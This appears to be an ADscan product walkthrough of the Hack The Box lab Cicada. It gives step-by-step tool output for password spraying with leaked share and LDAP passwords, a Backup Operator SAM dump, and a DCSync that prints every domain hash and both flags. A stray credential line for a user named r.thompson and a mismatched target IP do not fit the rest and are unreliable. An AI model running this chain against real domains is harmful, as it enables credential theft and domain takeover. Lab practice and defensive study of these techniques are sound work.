๐ Cicada - Auto-Pwn Walkthrough
Automatically compromise HTB Cicada using ADscan through SMB share spidering, password spraying, and domain credential dumping
Lab Information
- Platform: Hack The Box
- Machine: Cicada (Retired)
- Difficulty: Easy
- OS: Windows Server 2008 R2
- Domain: cicada.htb
Prerequisites
If this is your first time using ADscan:
- Follow the Getting Started guide to install ADscan.
- Run
adscan installto pull the ADscan runtime image.
Before starting this lab, verify your environment:
adscan check
adscan install # if the check reports missing images or Docker issuesEnsure you also have:
- An active VPN connection to the HTB network
- The correct VPN interface up (typically
tun0)
Attack Overview
Cicada is vulnerable to:
- SMB Share Enumeration - Discover HR documents and leaked passwords with guest access
- Password Spraying - Use high-confidence passwords to compromise multiple users
- LDAP Metadata Abuse - Steal passwords from descriptive fields (user descriptions)
- Backup Operator Abuse - Use backup-style privileges to dump local SAM and pivot to Domain Admin
- DCSync Credential Dump - Extract all domain account hashes for persistence
Estimated time with ADscan: ~4-5 minutes (automatic mode)
Walkthrough
Step 1: Workspace Setup
Start ADscan and create a dedicated workspace for this lab:
adscan startIf this is your first run (no workspaces yet), ADscan will prompt you to create one.
โ No workspaces detected.
Enter name for a new workspace: : cicada
โ Workspace 'cicada' created
โน Loading workspace data from: ~/.adscan/workspaces/cicada
โน Variables loaded from ~/.adscan/workspaces/cicada/variables.json
โ Workspace data successfully processed for ~/.adscan/workspaces/cicada
โ Workspace 'cicada' selected automatically as it's the only one.Step 2: Configure Target
Set the scan parameters for Cicada:
(ADscan:cicada ~/.adscan/workspaces/cicada) > set hosts 10.10.10.182
(ADscan:cicada ~/.adscan/workspaces/cicada) > set iface tun0
(ADscan:cicada ~/.adscan/workspaces/cicada) > set auto true โ Hosts configured: 10.10.10.182
โ Interface configured: tun0 with IP: 10.10.14.X
โ Auto mode configured: TrueScope: Cicada is a multi-stage AD lab where ADscan LITE shines after you have network access to the domain controller over the HTB VPN. From that point, it automates guest HR share spidering, multi-step password spraying, Backup Operator abuse, flag capture, and DCSync.
For labs where most of the work is web, reversing, or other non-AD puzzles before any AD service is reachable, see Labs Scope & Coverage to see how ADscan fits into a hybrid workflow.
Step 3: Start Unauthenticated Scan
Launch the initial unauthenticated enumeration:
(ADscan:cicada ~/.adscan/workspaces/cicada) > start_unauthADscan will first attempt SMB-based discovery (null session, RID cycling) and only pivot to LDAP or authenticated actions once it has a user list or credentials.
3.1 SMB Discovery and User Enumeration
โน Starting host detection on 10.129.231.149...
โน Starting smb scan
โ New domain found: cicada.htb
โ smb scan finished.
โน Checking for null sessions on SMB on the domain cicada.htb
โ null sessions not accepted for domain cicada.htb.
โน Checking RID cycling for guest session
โ No output received from NetExec (attempt 1/3). Retrying command...
โ RID cycling successful with a guest session on domain cicada.htb
โน Enumerating users by RID
6 Users found
โญโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโฎ
โ Index โ Users โ
โโโโโโโโโผโโโโโโโโโโโโโโโโโโโโค
โ 1 โ Administrator โ
โ 2 โ john.smoulder โ
โ 3 โ sarah.dantelia โ
โ 4 โ michael.wrightson โ
โ 5 โ david.orelious โ
โ 6 โ emily.oscars โ
โฐโโโโโโโโดโโโโโโโโโโโโโโโโโโโโฏ
โน Searching for AS-REP roastable users in domain cicada.htb
โ No asreproastable users found in domain cicada.htb
Do you want to perform password spraying on domain cicada.htb using a with_users session? [y/n] (y): n- ADscan discovers the
cicada.htbdomain during the initial SMB scan. - Null sessions are rejected, so it falls back to RID cycling with a guest session.
- RID cycling successfully enumerates six domain users, giving a solid username list.
- AS-REP roasting is attempted but no roastable users are found.
- We intentionally skip immediate password spraying with the
with_userssession to stay closer to the real lab flow.
3.2 Guest Share Enumeration (HR)
โน Checking shares access with a null session on domain cicada.htb
โ null sessions not accepted on any share of cicada.htb
โน Checking shares access with a guest session on domain cicada.htb
โญโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ SMB Shares discovered on cicada.htb โ
โ (guest session) โ
โ โ
โ Host Share Permission โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ 10.129.231.149 HR READ โ
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
Do you want to search for juicy information in the shares in domain cicada.htb with a guest session (โ WARNING: This will be really noisy and will saturate the network in big domains)? [y/n] (y): y
โน Searching for interesting file extensions in the shares of domain cicada.htb. This might take a while, please be patient
โ No files found
โน Searching for possible passwords in the shares of domain cicada.htb. This might take a while, please be patient
โน Log saved in smb/spidering_passw.log
โ Credentials found in shares:
โญโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ DOC_CREDENTIALS (1 found) โ
โ โโโโโโโโณโโโโโโโโโโโโโโโโโโโโโโโโโโโณโโโโโโโโโโโโโโโณโโโโโโโโโ โ
โ โ โ โ ML โ โ โ
โ โ # โ Value โ Confidence โ Line โ โ
โ โกโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฉ โ
โ โ 1 โ Cicada$M6Corpb*@Lp#nZp!8 โ 99.90% โ 10 โ โ
โ โโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโดโโโโโโโโโ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โญโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ Password (1 found) โ
โ โโโโโโโโณโโโโโโโโโโโโโโโโโโโโโโโโโโโณโโโโโโโโโโโโโโโณโโโโโโโโโ โ
โ โ โ โ ML โ โ โ
โ โ # โ Value โ Confidence โ Line โ โ
โ โกโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฉ โ
โ โ 1 โ Cicada$M6Corpb*@Lp#nZp!8 โ 99.44% โ 10 โ โ
โ โโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโดโโโโโโโโโ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โ Credentials saved to smb/spidering/ directory:
โน - DOC_CREDENTIALS: smb/spidering/doc_credentials.json
โน - Password: smb/spidering/password.json
? Select a password for password spraying (sorted by ML confidence): (Use arrow keys)
ยป Cicada$M6Corpb*@Lp#nZp!8 [ML: 99.90%]- Null sessions to shares fail, but guest access is allowed to the
HRshare. - ADscan spiders the share and runs its ML-based secret detector over file contents.
- A strong-looking candidate password
Cicada$M6Corpb*@Lp#nZp!8is found and ranked with very high confidence. - The credential is stored under
smb/spidering/, so the workspace keeps a full audit trail. - This password will be reused in the next step for domain-wide password spraying.
3.3 Password Spraying and Initial Access
โน Selected credential for spraying: Cicada$M6Corpb*@Lp#nZp!8
Do you want to perform password spraying on domain cicada.htb using the selected credential? [y/n] (y):
โน Performing password spraying on domain cicada.htb with found password...
โน Executing spraying command for cicada.htb
โ Performing the spraying on cicada.htb. Please be patient (this can take a while)
โ [!] 2025/12/04 20:03:03 > [+] VALID LOGIN: [email protected]:Cicada$M6Corpb*@Lp#nZp!8
โ Kerberos TGT created successfully
โน Kerberos ticket generated for [email protected]
โ LITE mode: ๐ Trust enumeration requires PRO.
โน Starting authenticated enumeration for 'cicada.htb' domain.
โน BloodHound data collection for cicada.htb is starting (this might take a while in big domains)
โน Running BloodHound collector on the domain cicada.htb (this may take a while)
โ BloodHound collector executed successfully on the domain cicada.htb.
โน Launching BloodHound CE suite...
โน BloodHound CE is ready!
Access the UI at: http://localhost:8442/ui/login
โน Uploading ZIP file to BloodHound CE automatically
โ ZIP file uploaded but ingestion status unclear. Check BloodHound CE UI for details.
โน Searching for enabled computers on domain cicada.htb
1 Enabled Computers found
โญโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโฎ
โ Index โ Enabled Computers โ
โโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโค
โ 1 โ cicada-dc.cicada.htb โ
โฐโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโฏ
โน Executing port scan in domain cicada.htb (this might take a while in big domains)...
โ Important port scan for the domain completed.
โน Creating a list of all enabled users for domain cicada.htb
7 Enabled Users found
โญโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโฎ
โ Index โ Enabled Users โ
โโโโโโโโโผโโโโโโโโโโโโโโโโโโโโค
โ 1 โ Administrator โ
โ 2 โ Guest โ
โ 3 โ john.smoulder โ
โ 4 โ sarah.dantelia โ
โ 5 โ michael.wrightson โ
โ 6 โ david.orelious โ
โ 7 โ emily.oscars โ
โฐโโโโโโโโดโโโโโโโโโโโโโโโโโโโโฏ
โน Creating a list of admin users for domain cicada.htb
2 Admin Users found
โญโโโโโโโโฌโโโโโโโโโโโโโโโโฎ
โ Index โ Admin Users โ
โโโโโโโโโผโโโโโโโโโโโโโโโโค
โ 1 โ Administrator โ
โ 2 โ emily.oscars โ
โฐโโโโโโโโดโโโโโโโโโโโโโโโโฏ
โน Creating a list of privileged users for domain cicada.htb
2 Privileged Users found
โญโโโโโโโโฌโโโโโโโโโโโโโโโโโโโฎ
โ Index โ Privileged Users โ
โโโโโโโโโผโโโโโโโโโโโโโโโโโโโค
โ 1 โ Administrator โ
โ 2 โ emily.oscars โ
โฐโโโโโโโโดโโโโโโโโโโโโโโโโโโโฏ
โน Enumerating Kerberos delegations in domain cicada.htb
โ No delegations found in domain.
โน Searching for ADCS in domain cicada.htb
โ ADCS not found in domain cicada.htb
โน Searching for kerberoastable users in domain cicada.htb
โ No kerberoastable users found in domain cicada.htb
โน The user michael.wrightson is not in the privileged list of domain cicada.htb
Do you want to enumerate privileges for user michael.wrightson? [y/n]: n
Do you want to perform password spraying on domain cicada.htb using a auth session? [y/n] (y): n- ADscan validates the sprayed password and logs in as
michael.wrightson. - BloodHound collection and port scanning provide an overview of domain computers and topology.
- Enabled and privileged user lists highlight
emily.oscarsas a key target. - Since
michael.wrightsonis not privileged, the workflow pivots to hunting for additional credentials instead of immediately exploiting AD paths.
3.4 LDAP Descriptions โ david.orelious
Do you want to perform password spraying on domain cicada.htb using a auth session? [y/n] (y): n
โน Searching for user descriptions in domain cicada.htb
โ Moved UserDesc log to domains/cicada.htb/ldap/descriptions.log
โญโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ โ
โ User Descriptions (4 found) โ
โ โโโโโโโโณโโโโโโโโโโโโโโโโโณโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ # โ Username โ Description โ โ
โ โกโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฉ โ
โ โ 1 โ Administrator โ Built-in account for administering the computer/domain โ โ
โ โ 2 โ Guest โ Built-in account for guest access to the computer/domain โ โ
โ โ 3 โ david.orelious โ Just in case I forget my password is aRt$Lp#7t*VQ!3 โ โ
โ โ 4 โ krbtgt โ Key Distribution Center Service Account โ โ
โ โโโโโโโโดโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โ [+] Found 1 potential password(s) in user descriptions:
โน User: david.orelious - Password: aRt$Lp#7t*VQ!3 (confidence: 76.32%)
โ Kerberos TGT created successfully
โน Kerberos ticket generated for [email protected]
โน The user david.orelious is not in the privileged list of domain cicada.htb
Do you want to enumerate privileges for user david.orelious? [y/n]: y
Do you want to enumerate privileges for user david.orelious on various services on hosts? (โ WARNING: This will saturate the network if the number of hosts in domain cicada.htb is very high) [y/n]: y
โน Starting smb privilege enumeration for user david.orelious
โ smb enumeration completed for user david.orelious. No hosts with privileges found.
โน Starting winrm privilege enumeration for user david.orelious
โ winrm enumeration completed for user david.orelious. No hosts with privileges found.- LDAP descriptions often contain operational notes; here one leaks
david.oreliousโs password in plain text. - ADscan automatically extracts that value and tests it, obtaining a TGT for
david.orelious. - Privilege checks confirm he is not privileged and has no direct SMB/WinRM access advantages.
- The account is still useful for expanding share access and discovering more secrets.
3.5 Shares as david.orelious โ Second Password
Do you want to enumerate shares for user david.orelious in the domain cicada.htb? [y/n] (y): y
โน Checking shares access as user david.orelious in domain cicada.htb
โญโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ SMB Shares discovered on cicada.htb โ
โ (david.orelious session) โ
โ โ
โ Host Share Permission โ
โ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ 10.129.231.149 SYSVOL READ โ
โ DEV READ โ
โ HR READ โ
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
Do you want to search for juicy information in the shares in domain cicada.htb with a david.orelious session (โ WARNING: This will be really noisy and will saturate the network in big domains)?
[y/n] (y): y
โน Searching for possible passwords in the shares of domain cicada.htb. This might take a while, please be patient
โน Log saved in smb/spidering_passw.log
โ Credentials found in shares:
โญโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ CMD ConvertTo-SecureString (1 found) โ
โ โโโโโโโโณโโโโโโโโโโโโโโโโโโโณโโโโโโโโโโโโโโโณโโโโโโโโโ โ
โ โ โ โ ML โ โ โ
โ โ # โ Value โ Confidence โ Line โ โ
โ โกโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฉ โ
โ โ 1 โ Q!3@Lp#M6b*7t*Vt โ 99.99% โ 8 โ โ
โ โโโโโโโโดโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโดโโโโโโโโโ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โญโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ DOC_CREDENTIALS (1 found) โ
โ โโโโโโโโณโโโโโโโโโโโโโโโโโโโโโโโโโโโณโโโโโโโโโโโโโโโณโโโโโโโโโ โ
โ โ โ โ ML โ โ โ
โ โ # โ Value โ Confidence โ Line โ โ
โ โกโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฉ โ
โ โ 1 โ Cicada$M6Corpb*@Lp#nZp!8 โ 99.90% โ 12 โ โ
โ โโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโดโโโโโโโโโ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โญโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ Password (1 found) โ
โ โโโโโโโโณโโโโโโโโโโโโโโโโโโโโโโโโโโโณโโโโโโโโโโโโโโโณโโโโโโโโโ โ
โ โ โ โ ML โ โ โ
โ โ # โ Value โ Confidence โ Line โ โ
โ โกโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฉ โ
โ โ 1 โ Cicada$M6Corpb*@Lp#nZp!8 โ 99.44% โ 12 โ โ
โ โโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโดโโโโโโโโโ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โ Credentials saved to smb/spidering/ directory:
โน - DOC_CREDENTIALS: smb/spidering/doc_credentials.json
โน - CMD ConvertTo-SecureString: smb/spidering/cmd_convertto-securestring.json
โน - Password: smb/spidering/password.json
? Select a password for password spraying (sorted by ML confidence): (Use arrow keys)
ยป Q!3@Lp#M6b*7t*Vt [ML: 99.99%]
Cicada$M6Corpb*@Lp#nZp!8 [ML: 99.90%]- With
david.oreliousโs access, ADscan can spider additional shares and spot PowerShellConvertTo-SecureStringusage. - The secure string reveals a new, highly ranked password
Q!3@Lp#M6b*7t*Vt. - Both this and the earlier Cicada password are saved into the workspaceโs
smb/spidering/JSON files. - ADscan selects the new password as the best candidate for another round of domain-wide spraying.
3.6 Second Spraying and Flag Capture
โน Selected credential for spraying: Q!3@Lp#M6b*7t*Vt
โ Note: 2 credentials were found. Only the selected credential will be used for automated spraying. All credentials have been saved to smb/spidering/ directory. You can manually perform password
spraying with the other credentials later, but be careful not to lock accounts. Wait at least 1 hour between password spraying attempts (or as specified in the password policy).
Do you want to perform password spraying on domain cicada.htb using the selected credential? [y/n] (y):
โน Performing password spraying on domain cicada.htb with found password...
โน Executing spraying command for cicada.htb
โ Performing the spraying on cicada.htb. Please be patient (this can take a while)
โ [!] 2025/12/04 20:06:05 > [+] VALID LOGIN: [email protected]:Q!3@Lp#M6b*7t*Vt
โ Kerberos TGT created successfully
โน Kerberos ticket generated for [email protected]
โ The user emily.oscars is in the privileged list of domain cicada.htb
โ User emily.oscars has elevated privileges in the domain (adminCount=1).
โ The user emily.oscars is a member of the Backup Operators group
โ User has winrm access to the PDC, dumping SAM through winrm
โน Dumping SAM credentials from host 10.129.231.149 in domain cicada.htb
โ Hash found from SAM dump - Local User: Administrator, NT Hash: 2b87e7c93a3e8a0ea4a581937016f341
โ Logon failure for local user 'administrator' on host '10.129.231.149' via smb. Incorrect credentials.
โน Trying with domain credentials instead...
โน Kerberos ticket generated for [email protected]
โ The user administrator is in the privileged list of domain cicada.htb
โ User administrator has elevated privileges in the domain (adminCount=1).
โ The user administrator is a member of the Domain Admins group
โญโโโโโโโโโโโโโโโโ Domain Compromised โโโโโโโโโโโโโโโโโฎ
โ โ
โ Domain cicada.htb compromised in 5.61 minute(s). โ
โ โ
โฐโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โ SMB/RPC port 445 is closed on the PDC. Unable to use 'net time' fallback.
โ Failed to synchronize clock with PDC 10.129.231.149
โน Obtaining flags from domain cicada.htb
Flags in domain cicada.htb
โญโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ Type โ Path โ Flag โ
โโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ user โ C:\Users\emily.oscars.CICADA\Desktop\user.txt โ ef26403104395d504f47871b801e5694 โ
โ root โ C:\Users\Administrator\Desktop\root.txt โ 5da453656222f948c5ebb48a7c2bb6f0 โ
โฐโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ
โน User flag saved to: /root/.adscan/workspaces/cicada/flags/user.txt
โน Root flag saved to: /root/.adscan/workspaces/cicada/flags/root.txt- Spraying with
Q!3@Lp#M6b*7t*Vtcompromisesemily.oscars, a Backup Operator with WinRM access to the DC. - ADscan abuses backup-style privileges to dump the local SAM and turn the Administrator hash into Domain Admin access.
- Once
[email protected]is obtained, ADscan captures both flags and the domain is fully owned.
3.7 Complete Credential Dump (DCSync)
Do you want to perform a DCSync in domain cicada.htb? [y/n]: y
Specify the user to extract NTLM hashes from (type 'All' for all users) (Administrator): All
โน Performing DCSync for all users
โ Something went wrong while executing credential extraction. Reattempting with another method...
โ Found credential: cicada.htb/Administrator with hash 2b87e7c93a3e8a0ea4a581937016f341
โ Found credential: cicada.htb/krbtgt with hash 3779000802a4bb402736bee52963f8ef
โ Found credential: cicada.htb/john.smoulder with hash 0d33a055d07e231ce088a91975f28dc4
โ Found credential: cicada.htb/sarah.dantelia with hash d1c88b5c2ecc0e2679000c5c73baea20
โ Found credential: cicada.htb/michael.wrightson with hash b222964c9f247e6b225ce9e7c4276776
โ Found credential: cicada.htb/david.orelious with hash ef0bcbf3577b729dcfa6fbe1731d5a43
โ Found credential: cicada.htb/emily.oscars with hash 559048ab2d168a4edf8e033d43165ee5
โ DCSync completed successfully.
โน Extracted 7 domain credentials.
Extracted credentials for domain cicada.htb
โญโโโโโโโโโโโโโโโโโโโโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฎ
โ User โ Credential โ
โโโโโโโโโโโโโโโโโโโโโผโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ Administrator โ 2b87e7c93a3e8a0ea4a581937016f341 โ
โ krbtgt โ 3779000802a4bb402736bee52963f8ef โ
โ john.smoulder โ 0d33a055d07e231ce088a91975f28dc4 โ
โ sarah.dantelia โ d1c88b5c2ecc0e2679000c5c73baea20 โ
โ michael.wrightson โ b222964c9f247e6b225ce9e7c4276776 โ
โ david.orelious โ ef0bcbf3577b729dcfa6fbe1731d5a43 โ
โ emily.oscars โ 559048ab2d168a4edf8e033d43165ee5 โ
โฐโโโโโโโโโโโโโโโโโโโโดโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฏ- As a final step, ADscan performs a full DCSync to dump all domain account hashes.
- Even if the first attempt fails, it transparently retries with a different method until extraction succeeds.
- The final credential table gives a complete view of all domain users and hashes for reporting and followโup analysis.
Attack Chain Breakdown
- Technique: SMB spidering with guest session
- Outcome: ML classifier identifies strong password
Cicada$M6Corpb*@Lp#nZp!8in HR documents.
- Technique: Domain password spraying with a single high-confidence credential
- Outcome: Compromise of
michael.wrightson, plus full BloodHound / user enumeration.
- Technique: LDAP
descriptionfield hunting - Outcome: Cleartext password for
david.orelious, new TGT and expanded share access.
- Technique: Parsing
ConvertTo-SecureStringusage in scripts on SYSVOL/DEV/HR - Outcome: Second strong password
Q!3@Lp#M6b*7t*Vtextracted and validated.
- Technique: Password spraying with new credential, SAM dump via WinRM, hash re-use as domain credential
- Outcome:
emily.oscarscompromise, then[email protected]TGT and full domain control.
- Technique: Automated flag retrieval and DCSync with Administrator rights
- Outcome: User and root flags stored under the Cicada workspace, plus hashes for all 7 domain accounts.
Initial Access Achieved! Credentials obtained: r.thompson:rY4n5eva
Timing Breakdown
Automatic mode (set auto True):
- SMB discovery + RID cycling + guest HR spidering: ~60โ90 seconds
- First password spray (
Cicada$โฆ) + BloodHound collection: ~60โ90 seconds - LDAP description hunting +
david.oreliousTGT + share spidering: ~60 seconds - Second password spray (
Q!3@โฆ) + SAM dump + flags: ~60โ90 seconds - Full DCSync of 7 accounts: ~30 seconds
- Total (observed): ~5โ6 minutes (domain compromise banner: 5.61 minutes)
Semi-automatic mode (set auto False):
- Add ~2โ3 minutes for manual confirmations and branching decisions
- Total (typical): ~7โ9 minutes
Manual time: ~60โ120 minutes | ADscan time: ~5โ6 minutes
Troubleshooting
LDAP anonymous bind fails
Verify LDAP port accessibility:
nmap -p 389,636 10.10.10.182
# Should show open portsSMB access denied
Ensure credentials are correctly formatted:
# In ADscan
creds show
# Verify no encoding issues with passwordsClock skew errors
Synchronize time with target DC:
sudo ntpdate 10.10.10.182
# Kerberos requires time sync within 5 minutesKey Learning Points
What ADscan Automated
- Reconnaissance: SMB host detection, RID cycling, and guest share spidering
- Initial Access: Password discovery in HR documents and LDAP descriptions
- Lateral Movement: Password spraying to compromise multiple user accounts
- Privilege Escalation: Abuse of Backup Operator privileges and SAM dumping
- Post-Exploitation: DCSync-based credential harvesting for all domain accounts
Security Lessons
- LDAP hardening: Disable anonymous binds and restrict readable attributes
- Descriptive fields: Avoid storing passwords or hints in user descriptions or comments
- Secure storage: Never store passwords in scripts, documents, or logs in cleartext
- Backup privileges: Backup Operators effectively hold powerful lateral-movement and privilege-escalation capabilities
- Defense detection: Monitor for unusual password spraying, share spidering, and DCSync activity